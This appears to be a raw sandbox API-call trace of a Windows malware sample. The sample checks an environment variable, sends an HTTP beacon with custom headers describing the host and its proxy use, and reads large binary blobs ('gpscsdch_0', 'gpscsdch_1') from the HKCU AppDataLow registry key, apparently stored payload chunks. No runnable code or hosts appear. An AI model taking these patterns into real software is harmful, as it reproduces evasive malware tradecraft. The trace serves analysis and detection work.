	[0096.068] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x258f1e0, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0096.069] wsprintfW (in: param_1=0x259e140, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0096.069] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0096.069] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.069] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] lstrlenW (lpString="X-HTTP-Agent: WININET") returned 21
	[0096.070] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.070] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.071] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.072] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.073] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.074] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.075] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] GetLastError () returned 0x0
	[0096.076] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0096.076] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0096.076] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0096.076] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x258f300 | out: phkResult=0x258f300*=0x2bc) returned 0x0
	[0096.076] RegQueryValueExW (in: hKey=0x2bc, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f304*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f304*=0x0) returned 0x2
	[0096.076] RegCloseKey (hKey=0x2bc) returned 0x0
	[0096.077] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0096.077] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x258fb54, lpdwBufferLength=0x258fb34 | out: lpBuffer=0x258fb54, lpdwBufferLength=0x258fb34) returned 1
	[0096.077] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x258fb54, dwBufferLength=0x4) returned 1
	[0096.077] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1
	[0098.539] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x258fb5c, lpdwBufferLength=0x258fb60, lpdwIndex=0x0 | out: lpBuffer=0x258fb5c*, lpdwBufferLength=0x258fb60*=0x4, lpdwIndex=0x0) returned 1
	[0098.539] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x258fcac, lpdwBufferLength=0x258fb60, lpdwIndex=0x0 | out: lpBuffer=0x258fcac*, lpdwBufferLength=0x258fb60*=0x4, lpdwIndex=0x0) returned 1
	[0098.539] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x258f92c, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x258fca0 | out: lpBuffer=0x258f92c*, lpdwNumberOfBytesRead=0x258fca0*=0x4) returned 1
	[0098.539] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x258f92c, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x258fca0 | out: lpBuffer=0x258f92c*, lpdwNumberOfBytesRead=0x258fca0*=0x0) returned 1
	[0098.539] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0098.540] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0098.540] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.540] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.541] GetLastError () returned 0x0
	[0098.542] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0098.542] GetProcAddress (hModule=0x77960000, lpProcName="RtlComputeCrc32") returned 0x77a2d9b0
	[0098.542] GetLastError () returned 0x0
	[0098.542] GetLastError () returned 0x0
	[0098.542] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.543] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcb8, lpdwDisposition=0x0 | out: phkResult=0x258fcb8*=0x28c, lpdwDisposition=0x0) returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] GetLastError () returned 0x0
	[0098.544] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0098.544] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0x290, lpdwDisposition=0x0) returned 0x0
	[0098.544] RegQueryValueExW (in: hKey=0x290, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0098.554] RegQueryValueExW (in: hKey=0x290, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0098.572] RegCloseKey (hKey=0x290) returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.657] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] GetLastError () returned 0x0
	[0098.658] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_1") returned 10
	[0098.658] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0x72c, lpdwDisposition=0x0) returned 0x0
	[0098.658] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0098.668] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0098.741] RegCloseKey (hKey=0x72c) returned 0x0
	[0098.828] GetLastError () returned 0x0
	[0098.828] GetLastError () returned 0x0
	[0098.828] GetLastError () returned 0x0
	[0098.828] GetLastError () returned 0x0
	[0098.828] GetLastError () returned 0x0
	[0098.828] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
